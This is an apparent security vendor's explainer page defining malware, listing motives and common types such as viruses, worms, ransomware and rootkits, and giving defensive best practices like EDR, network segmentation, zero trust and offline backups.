What Is Malware?

Reviewed by Ryan Delany · November 20, 2025

Short for “malicious software,” malware is a computer program, software code, hardware, or firmware that is designed to harm or exploit any programmable device, server, or network. The malicious intent of malware can take many forms, including:

• Denial of access

• Destruction or theft of data

• Monetary theft

• Ransomware

• Hijacking computer resources

• Spreading misinformation, propagation of malware

Purpose and intent of malware

The goal of malware is to invade or corrupt a computer network, causing havoc and stealing information or resources. Malware attacks are driven by various motives, but they generally intend to reward the perpetrator at the victim's expense.

Common malicious purposes include:

• Financial Gain. Malware is often designed for profit. This includes holding devices, data, or networks hostage for money (ransomware), stealing financial assets, selling intellectual property on the dark web, and generating revenue through click fraud or adware.

• Data Theft and Espionage. Malware seeks to leak private information, gain unauthorized access to data or systems and steal login credentials, personal identification numbers, bank details, or passwords. Governments and malicious hackers use it to steal personal, financial, or business information.

• System Disruption and Sabotage. Malware is used to disrupt normal operations, lock up networks and PCs, making them unusable, or destroy computer systems to damage network infrastructure. Historically, malware like Stuxnet has been used for sabotage driven by political objectives, targeting industrial control systems.

• Resource Theft. Malicious software is used to hijack computing resources, turning infected systems into "zombie computers" or botnets used to send email spam, host contraband data, or engage in distributed denial-of-service (DDoS) attacks. Cryptojacking is a common tactic to steal computing power for cryptocurrency mining.

Types of malware

Researchers classify malicious software into numerous subtypes. Broadly, software can be categorized as goodware, grayware, or malware, with grayware being unwanted applications like spyware or adware that lack sufficient consensus or metrics to be fully classified as malware.

Common types of malware include:

• Viruses. Malicious code that embeds itself within another seemingly harmless program or file (like an executable or boot sector). Viruses spread when the infected program is run or the disk is booted.

• Worms. Standalone malicious software that actively transmits and copies itself over a network to infect other computers without needing to attach to a host program or requiring user interaction to spread.

• Trojan Horse (Trojan). Malware that disguises itself as a regular, benign, or useful program to trick the victim into installing it. Once started, it activates a hidden destructive function, often creating a backdoor or installing additional malware.

• Ransomware. Software that prevents a user from accessing their files or locks down an entire computer system until a ransom payment is made. Crypto ransomware encrypts contents, while locker ransomware only locks the system.

• Spyware. Secretly monitors user activities, such as web browsing and keystrokes, and collects sensitive information (passwords, credit card numbers) without the user's knowledge to transmit it back to an attacker.

• Adware. Installs without consent to display unwanted advertisements, often in pop-up form, to make money through clicks. Some dangerous types can install other software or redirect browsers to malicious sites.

• Rootkits. Software packages designed to conceal malicious software by modifying the host operating system so that the malware remains hidden from the user, sometimes for years. They can provide the attacker with administrator-level privileges.

• Fileless Malware. A type of attack that runs directly within the computer's memory instead of relying on files on the hard drive. It often uses existing system tools like PowerShell or exploits vulnerabilities in legitimate software to inject malicious code. This makes it difficult to detect with traditional antivirus programs.

• Cryptojacking (Cryptomining Malware). Hijacks a device's computing power to secretly mine cryptocurrency, causing performance slowdowns and taxing system resources.

• Droppers. A subtype of Trojan specifically designed to deliver malware onto the infected system while evading detection.

• Scareware. Uses social engineering tactics to frighten or shock a user into believing their system is infected or vulnerable, coercing them into purchasing unnecessary or dangerous software to remove the fake threat.

Malware infections can happen on any device or operating system, including Windows, Mac, iOS, and Android systems, as well as IoT devices. In 2024, the total amount of money received by ransomware actors alone amounted to $813 million, according to recent research.

Best practices for malware protection

Below are the primary strategies that individuals and organizations can implement for better malware protection.

Anti-malware software and advanced detection tools

• Install and Update Anti-malware/Antivirus Software. Anti-malware, sometimes called antivirus software, is crucial for blocking and removing some or all types of malware. It is the best way to remove malware from an infected computer or personal device. You should choose a solution that constantly updates to locate the widest range of threats.

• Employ Advanced Detection and Response Solutions. Today's standard antivirus products may not be enough to protect against advanced cyberthreats. Solutions that continually monitor and detect malware that has bypassed perimeter defenses are crucial.

  • Extended Detection and Response (XDR). XDR solutions integrate security tools across various layers—endpoints, email, identities, cloud apps, and data—to provide a holistic view for faster identification and disruption of sophisticated attacks.

  • Endpoint Detection and Response (EDR). EDR solutions monitor endpoint devices like smartphones, laptops, and servers for suspicious activity and automatically respond to detected malware.

  • Security Information and Event Management (SIEM). Next-gen SIEM platforms centralize and aggregate alerts from multiple security tools, making it easier to spot subtle signs of malware activity, such as processes using more bandwidth than normal or devices communicating with unknown servers.

  • Intrusion Detection/Prevention Systems (IDS/IPS). IPS systems monitor network traffic for suspicious activity that might indicate an attack.

  • Network Detection and Response (NDR). NDR solutions actively monitors the network for suspicious traffic patterns and alerts administrators of potential threats.

  • Email Security. Email security solutions analyze URLs and attachments to block suspicious emails. 

Network and system configuration defenses

Security measures at the network and system level can limit a malware infection's entry and spread.

• Firewalls and Network Segmentation. Firewalls decide which traffic to allow or block based on security rules. You should use firewall protection to filter network traffic, including traffic entering and exiting the network. Furthermore, network segmentation involves structuring a network into smaller networks and limiting the traffic flow between them to legitimate communication, which hinders malware's ability to replicate across the wider network.

• Sandboxing. This security model confines applications within a controlled environment, restricting their operations and isolating them from other applications and system resources. Browser sandboxing isolates web processes to prevent malware and exploits. More broadly, sandboxing can block an attack by isolating and confining malware (like a malicious email attachment) to a protected environment so IT teams can observe its behavior without risking network infection.

• Employ Behavior-based Analytics Software. This uses artificial intelligence and machine learning to profile normal user behavior and detect abnormal use of applications.

• Keep Software Updated and Patched. Regularly downloading and installing system updates and software patches as soon as they are available helps minimize security vulnerabilities that cybercriminals might exploit.

• Adopt a Zero Trust Model. A Zero Trust network architecture evaluates all users and devices for risk before permitting access to resources. This model implements principles like least privilege and network microsegmentation, which help ensure that if malware gets onto the network, its lateral movement is limited.

• Disable Unnecessary Features. Disable administrative tools, browser plug-ins, and macros that are not needed. Malware can exploit the flexible macros in applications like Microsoft Word, as these are a form of executable code.

Data management and recovery

• Back Up Data Frequently. Maintaining updated backups of sensitive data and system images is a crucial preemptive mitigation step. These backups should ideally be kept offline or disconnected from the network to protect them from malware, as some malware, especially ransomware, may seek out and delete online backups. Organizations should also regularly test backups to ensure they function properly.

• Create an Incident Response Plan. Developing a detailed, structured incident response plan ahead of time provides steps to take in different attack scenarios, helping cybersecurity teams manage and mitigate the impact of malware infections more quickly and ensure business continuity.

User training

User training on safe internet and social media practices is also recommended. Users benefit from regular informational updates on the latest malware threats, as well as reminders on security practices. 

IT employees can improve their security skills by attending a Trellix webinar and reviewing Trellix Threat Center reports.